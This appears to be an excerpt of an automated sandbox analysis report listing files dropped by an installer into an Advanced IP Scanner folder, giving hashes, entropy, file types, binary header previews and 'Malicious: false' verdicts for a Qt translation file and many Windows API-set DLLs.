Preview:	<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...\|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3...y......y......%......0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.\|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_zh_tw.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21326
Entropy (8bit):	5.601982778539758
Encrypted:	false
SSDEEP:	384:4DlwToFrc4xM4iwF3sE5nARVIAgNv95UWr/LGLKbTR1Zo:4DlwTsc4O4i8sE5ncWjz5UWr/y/
MD5:	B961B562628E357221F12EB6A212860C
SHA1:	35E6905D0410CEDC12B77EA8735CEDCB74913B25
SHA-256:	5730516CB06E0DAA2F97B0772C2233345E70890A775D1850F4031FDAAB993967
SHA-512:	8A887CC03D628FDAE3F0B8A4DC4E0E71793D95AF7B561D6DDED82944E3B4D9C92CB93989A3236815D00CAEB5BC57E87809A372FC5B8509D36A54403EC2CAEB37
Malicious:	false
Preview:	<.d....!..`...B..........A....;.......;...k...;.......;.......;..1n...O..C....[..@x...^..#....^..=J..(5......G.......H,..;...K.......N:......V...2..._...D...............;'...y..;{.......o..............Ab...t.......t..;....t..C....../T...j......5t...!..@...0...H5..B...f...#.......30.......m.......E...~..%....`..(....e..C'......CK.......H. =...3...y......y......%...F..0...q.+.......+......+....@.+....\.+.......G.......G.......H0...Cq.Hw9.....Hw9.....I.....Z.J6......J6......J6......J6...5..LD......L.b..C..M.S../..R.....@.V....#..Wi...B..W.T.....Z.\|..<e.[f3..?R.gc......w0K..4...H...........Db...T......."..'....~..(... d..3....T.."...2....+......Bj......G7.9.E.....L.#..IK.M$o.....e.....^.l8...(E...^..5...I...........0.......=.......B-..>......>...2..3..#G..l...7&........5.l..Fi.AV....#.y....@....0..=.......<.......A...tb..'.......................=.......-.......:..(....=p.1V......R....$..W.<..F..f.~...&......&...1........^..'....5...Q..........c..3..;6...H..q.J..:...I....i..I

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.960788331628294
Encrypted:	false
SSDEEP:	192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
MD5:	37DA7F6961082DD96A537235DD89B114
SHA1:	DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
SHA-256:	6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
SHA-512:	AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................+............ ...................<..............8............................................................................text...;........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.97464085764015
Encrypted:	false
SSDEEP:	192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
MD5:	3B3BD0AD4FEA16AB58FCAEAE4629879C
SHA1:	EB175F53640FB8AC4028A7657BBF48823A535677
SHA-256:	DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
SHA-512:	F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@.......................................... ...................<..............8............................................................................text... ........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.982441576564087
Encrypted:	false
SSDEEP:	384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
MD5:	584766DF684B2AD2A3A5B05A5B457FAC
SHA1:	C207B7AEDB8D978C8320A1454331519A8365F20D
SHA-256:	B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
SHA-512:	3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......!h....@.......................................... ...................<..............8............................................................................text...+........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.00674396465633
Encrypted:	false
SSDEEP:	192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
MD5:	906CB0C8ABA8342D552B0F37DDFD475F
SHA1:	A3CD528B9C212FEA97495A557A91D638B1608418
SHA-256:	582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
SHA-512:	27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22208
Entropy (8bit):	6.906399541614446
Encrypted:	false
SSDEEP:	192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
MD5:	779A8B14C22E463EA535CBCA9EA84D49
SHA1:	4620531D5291878C10D6E3974F240B98BC7FB4B9
SHA-256:	FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
SHA-512:	08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.98650705248822
Encrypted:	false
SSDEEP:	192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
MD5:	F6D1216E974FB76585FD350EBDC30648
SHA1:	F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
SHA-256:	348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
SHA-512:	756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......W5....@.............................L............ ...................<..............8............................................................................text...\........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.046229749504995
Encrypted:	false
SSDEEP:	192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
MD5:	BFB08FB09E8D68673F2F0213C59E2B97
SHA1:	E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
SHA-256:	6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
SHA-512:	E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.993015464813673
Encrypted:	false
SSDEEP:	192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
MD5:	FC68978ABB44E572DFE637B7DD3D615F
SHA1:	47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
SHA-256:	DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
SHA-512:	7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@............................._............ ...................<..............8............................................................................text...o........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.95985126360952
Encrypted:	false
SSDEEP:	384:8l6W2hWJ7QA0GftpBj8VbJOAlXBtFwA+S:p+yi2VbJy4
MD5:	1CD8672D8C08B39560A9D5518836493E
SHA1:	C7CE2330265D07D88AD15F80DD88473F3DAAFCD0
SHA-256:	4A5F33A0837A9D9F22D49EE6D062BAE671A4C5C5522DB6FFE03C1AA2C0BD008E
SHA-512:	6BCE6EF09746C10E3B3F136BB2CE67002F27FF70C3FCBA48E7F1C3769000A62649A41FD82ACBE2A819B8ECE96D8E9399B15104CA2B40F65B51A0C84FC2A7901C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.9718846004654225
Encrypted:	false
SSDEEP:	384:8vlYsFeW2hWu7QA0GftpBjECp4DlXBtFwCf:8izyiChyG
MD5:	B8BB783DEE4EA95576882625C365E616
SHA1:	E9AF4B17FC082B5D717BFA013D46DA4BDFFB2CD3
SHA-256:	21BD55B9D42A5FAA5FA3C5DD9FAD1665DF3C33557CC4F7A58248A88B69D372B8
SHA-512:	B756468DCF7254FD31D3650F794B837724A82207001B521105BE05DF4CF187785897BE8377083C53A92C0DC5AEE2CDAF8B9538FD6944E0AC4BE5D286836037A1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......`....@.......................................... ...................<..............8............................................................................text...$........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.018574692016083
Encrypted:	false
SSDEEP:	384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
MD5:	44CA070DC5C09FF8588CF6CDCB64E7A2
SHA1:	63D1DA68CD984532217BEACC21B868B46EC5D910
SHA-256:	EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
SHA-512:	C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21184
Entropy (8bit):	6.98505637818331
Encrypted:	false
SSDEEP:	384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
MD5:	3B9D034CA8A0345BC8F248927A86BF22
SHA1:	95FAF5007DAF8BA712A5D17F865F0E7938DA662B
SHA-256:	A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
SHA-512:	04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.986049300390525
Encrypted:	false
SSDEEP:	192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
MD5:	FC13F11A2458879B23C87B29C2BAD934
SHA1:	68B15CC21F5541DC2226E9E967E08AF81D04A537
SHA-256:	624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
SHA-512:	801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...\|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.04628745407397
Encrypted:	false
SSDEEP:	192:bhkd6WVghW/vt7l9YOCAs/nGfe4pBjSfWP18gWNArXVWQ4mW0tXqnajL1dHx3tKU:aYW2hWt7QA0GftpBj7PS8rxlXBtFwVoF
MD5:	07954AF744363F9807355E4E9408DF45
SHA1:	B37D06B39EB7186B55CEAE25427B7AB95E46E32F
SHA-256:	4B20AAF0E3B7566B797652F8D84B749AB23F7D1557DBA882C0590FE1BE98CED6
SHA-512:	B7A7C16EF8BE62D9F562DCECF01B2AD1C066DE92AA4CA7A8C7BB93A80B1BC781F8A6A47F51A252E40337BD8D7778CACFEE7488A5FAD15F11D24C90572AD0E4C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.961454559139268
Encrypted:	false
SSDEEP:	192:GkZjWVghW/WgbXH9YOCAs/nGfe4pBjSfr4i6wWNArXVWQ4mWQVUqnajMHxxBNT0u:fjW2hWegbCA0GftpBjc4aolI663Ub2
MD5:	39556E904FA2405ABAF27231DA8EF9E5
SHA1:	89DB01B04DFDBE5C0F5E856050611A6A72F1AFD0
SHA-256:	5F476627A904B182D9B3F142594DEFA267DB3CE8206BAC24AF063A29635B3A8B
SHA-512:	558C0D0DD0CE24C7DCDEBAE64578E09ACC36A86B6F121266A147394DD9E8F8B2B81726B9CCC24ED07755950CD13C1D34CAB137E995D0BE25EBF52699D0FBB6B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......B.....@......................... ...G............ ...................<..............8............................................................................text...g........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.988142648004873
Encrypted:	false
SSDEEP:	384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
MD5:	39047E168FFBDD19185504633D6ECA29
SHA1:	FE3423689EFEDADA19C7DEC3D5DD077A057BF379
SHA-256:	611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
SHA-512:	8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......~.....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.000917619737006
Encrypted:	false
SSDEEP:	192:QgxDfIeJWVghW/c7l9YOCAs/nGfe4pBjSfxyWNArXVWQ4mWgBHqnaj9RlS6V6Qg:JDfIeJW2hWk7QA0GftpBjxdBHlBRAky
MD5:	C2EAD5FCCE95A04D31810768A3D44D57
SHA1:	96E791B4D217B3612B0263E8DF2F00009D5AF8D8
SHA-256:	42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62
SHA-512:	C90048481D8F0A5EDA2EB6E7703B5A064F481BB7D8C78970408B374CB82E89FEBC2E36633F1F3E28323FB633D6A95AA1050A626CB0CB5EC62E9010491AAE91F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.0782836442636174
Encrypted:	false
SSDEEP:	384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
MD5:	7697F94ED76B22D83D677B999EDFC2E1
SHA1:	42AFB5B8E76B8B77D845156B7124CC3E0C613F91
SHA-256:	50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
SHA-512:	1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.072469017642331
Encrypted:	false
SSDEEP:	384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
MD5:	FDF0B4BF0214585E18EE2F6978F985B0
SHA1:	0FE247F8CCA0C04729135EE612FBFCED92D59D9D
SHA-256:	CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
SHA-512:	D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.021897050678374
Encrypted:	false
SSDEEP:	384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
MD5:	687533A89B43510CCE4D8B2ECB261AA0
SHA1:	4004BA63880A92042C106FF6A549C6F5F69CE05D
SHA-256:	E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
SHA-512:	6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

